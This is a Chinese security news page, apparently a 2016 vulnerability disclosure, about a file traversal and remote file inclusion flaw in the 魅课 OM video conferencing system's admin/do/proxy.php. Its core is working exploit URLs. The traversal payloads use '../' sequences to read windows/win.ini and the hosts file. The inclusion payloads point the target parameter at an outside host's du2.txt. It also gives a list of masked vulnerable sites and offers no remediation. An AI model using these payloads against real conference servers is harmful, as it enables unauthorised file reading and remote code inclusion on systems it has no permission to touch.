频道栏目
首页 > 资讯 > 网络安全 > 正文

魅课OM视频会议系统前台任意文件遍历

16-05-19        来源:[db:作者]  
收藏   我要投稿

魅课OM视频会议系统前台任意文件遍历&远程文件包含

 

a.png

 

b.png

 

c.png



案例很多
 

d.png





OM视频会议系统

部分案例:

**.**.**.**:83/

**.**.**.**:84/

**.**.**.**:81/

http://**.**.**.**:81/

http://**.**.**.**:81/

**.**.**.**:81/

http://**.**.**.**:81/

**.**.**.**:84/

**.**.**.**:81/

**.**.**.**:82/

**.**.**.**:81/

http://**.**.**.**:81/

**.**.**.**:81/

**.**.**.**:82/

**.**.**.**/

**.**.**.**:81/

**.**.**.**/






 

任意文件遍历:

**.**.**.**:83/admin/do/proxy.php?method=get&target=http://**.**.**.**:80/push/35004/div_push_0/index.html&method=get&target=../../../../../../../../../../windows/win.ini



**.**.**.**:84/admin/do/proxy.php?method=get&target=http://**.**.**.**:80/push/35004/div_push_0/index.html&method=get&target=../../../../../../../../../../Windows/System32/drivers/etc/host
 

1.png





远程文件包含: 远程包含能干什么,你懂的比我多。。

**.**.**.**:81/admin/do/proxy.php?method=get&target=http://**.**.**.**:80/push/35004/div_push_0/index.html&method=get&target=**.**.**.**/invoker/du2.txt

**.**.**.**:84//admin/do/proxy.php?method=get&target=http://**.**.**.**:80/push/35004/div_push_0/index.html&method=get&target=**.**.**.**/invoker/du2.txt
 

2.png


 

相关TAG标签
上一篇:某证券CRM系统疑存在默认弱口令管理账号(涉及天风证券、东方证券、国联证券)
下一篇:金山wps某处注入泄露内网ip,域名,用户,账号,密码,邮箱,cookie,token,phpmyadmin绝对路径暴露
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站